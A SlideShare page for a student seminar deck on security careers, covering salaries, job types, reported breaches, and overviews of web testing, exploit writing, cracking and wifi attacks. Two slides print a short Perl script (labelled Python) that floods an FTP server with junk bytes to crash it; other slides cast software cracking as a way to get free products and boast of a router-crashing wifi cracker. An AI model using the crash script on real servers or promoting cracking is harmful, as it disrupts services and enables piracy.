Life Beyond Ethical Hacking“ The Actual Information Security”   By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
Acknowledgements  Dr. H.S Johal   Ms. Himanshi
Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator ...
Lets Go Old School ,What is EthicalHacking? Breaking Into Devices , Networks  Legally. Securing Servers, Recovering Ema...
Jobs And Stats
Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficul...
Salary Packages   Normal B.tech :     300K-400K   BPO           :     100K-250K   DEVELOPMENT :       300K-700K   SECU...
Beyond So Called “Ethical Hacking” Web Application Penetration  testing Exploit Writing Reverse Engineering Malware An...
Why To Go Beyond Ethical Hacking?   Jobs For Ethical Hacker:-   Trainer   Trainer   Trainer   Trainer   And Trainer...
Jobs Beyond Ethical Hacking:-   Jobs For Hackers:-   Researchers   Technical Heads   Penetration testers   Forensic I...
Benefits  of not Being a Hacker
Benefits  of Being a Hacker        I M UR WORST NIGHTMARE :-P
How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web  Applications , Websites , S...
How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network  Security infrastructu...
Why We Need More People ?                            Source: Indian Express
Why We Need More People ?                            Source: Times Of India
Host Gator Hacked !! 3 Lac Websites        Owned By Hackers                                      Source: SoftPedia
Host Gator Hacked !! 3 Lac Websites     Owned By Hackers Contd..                                      Source: Private
Norton India Hacked !!                         Source: Private
Norton India’s Database Hacked !!                                    Source: Private
Norton India’s Database Hacked !!                                    Source: Private
The Biggest Of All… Anonymous!!                                  Source: National Post
Now Beyond The Word ‘Ethical’          Web Application Penetration Testing :-•   Find Bugs In Web Applications – Custom Ma...
Rise Of The Web Applications
Fasten Your Seat Belts , Its Showtime   DEMO
Now Beyond The Word ‘Ethical’                  Exploit Writing• Potentially writing codes to exploit a  vulnerability .• H...
Now Beyond The Word ‘Ethical’   Simplest of The Exploit in Python- Crashing A Secure Port FTP                             ...
Now Beyond The Word ‘Ethical’   Simplest of The Exploit in Python- Crashing A Secure Port FTP                             ...
Now Beyond The Word ‘Ethical’      Prices for Various Exploits
Now Beyond The Word ‘Ethical’                 Reverse Engineering•   Editing the final software to find serials keys ,    ...
Now Beyond The Word ‘Ethical’              Wireless Penetration Testing•   Involves Auditing of Network Security Over    W...
INSANITY WIFI CRACKER                Insanity Wi-fi Cracker•   Developed By me and my Friends for minor    project•   Auto...
Wi-fi Cracking At a Click Of a Button  DEMO
So A One Last Question , Wanna go this ?
Or Wanna Go This ?
After AllIt’s your Career |Handle it with care|
Any Questions ?
ContactEmail :info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack....
Upcoming SlideShare
Loading in...5
×

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

1,135

Published on

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal

Published in: Education, Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,135
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
54
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

  1. 1. Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
  2. 2. Acknowledgements Dr. H.S Johal Ms. Himanshi
  3. 3. Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on Web Application Penetration Testing Course Student @ LPU  Tested Over 90+ Servers Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  4. 4. Lets Go Old School ,What is EthicalHacking? Breaking Into Devices , Networks Legally. Securing Servers, Recovering Emails etc. But the Question Remains ! Where to get these jobs ?
  5. 5. Jobs And Stats
  6. 6. Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking in 2 days workshop :-P No Proper facilities of required courses
  7. 7. Salary Packages Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
  8. 8. Beyond So Called “Ethical Hacking” Web Application Penetration testing Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
  9. 9. Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
  10. 10. Jobs Beyond Ethical Hacking:- Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month 
  11. 11. Benefits  of not Being a Hacker
  12. 12. Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  13. 13. How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing . Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software . Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  14. 14. How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc. Projects :- Good At Coding? Show to the whole world . Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
  15. 15. Why We Need More People ? Source: Indian Express
  16. 16. Why We Need More People ? Source: Times Of India
  17. 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  18. 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  19. 19. Norton India Hacked !! Source: Private
  20. 20. Norton India’s Database Hacked !! Source: Private
  21. 21. Norton India’s Database Hacked !! Source: Private
  22. 22. The Biggest Of All… Anonymous!! Source: National Post
  23. 23. Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made , Open Source Applications .• Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?• Lets See a Simple Example – SQL Injection Bypass
  24. 24. Rise Of The Web Applications
  25. 25. Fasten Your Seat Belts , Its Showtime DEMO
  26. 26. Now Beyond The Word ‘Ethical’ Exploit Writing• Potentially writing codes to exploit a vulnerability .• Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system.• Requirement : C,C++, Perl , Python , Ruby , Assembly language
  27. 27. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  28. 28. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  29. 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  30. 30. Now Beyond The Word ‘Ethical’ Reverse Engineering• Editing the final software to find serials keys , stop the online authentications ,• Mostly used by pirates• Sometimes used to edit the features of a final software• Make your Life easier with free products 
  31. 31. Now Beyond The Word ‘Ethical’ Wireless Penetration Testing• Involves Auditing of Network Security Over Wireless• Installation of Servers And Security Devices• Crack proofing Wireless Passwords• Highly paid• Requires Networking Background
  32. 32. INSANITY WIFI CRACKER Insanity Wi-fi Cracker• Developed By me and my Friends for minor project• Automates the cracking of various wifi securities• Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  33. 33. Wi-fi Cracking At a Click Of a Button DEMO
  34. 34. So A One Last Question , Wanna go this ?
  35. 35. Or Wanna Go This ?
  36. 36. After AllIt’s your Career |Handle it with care|
  37. 37. Any Questions ?
  38. 38. ContactEmail :info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×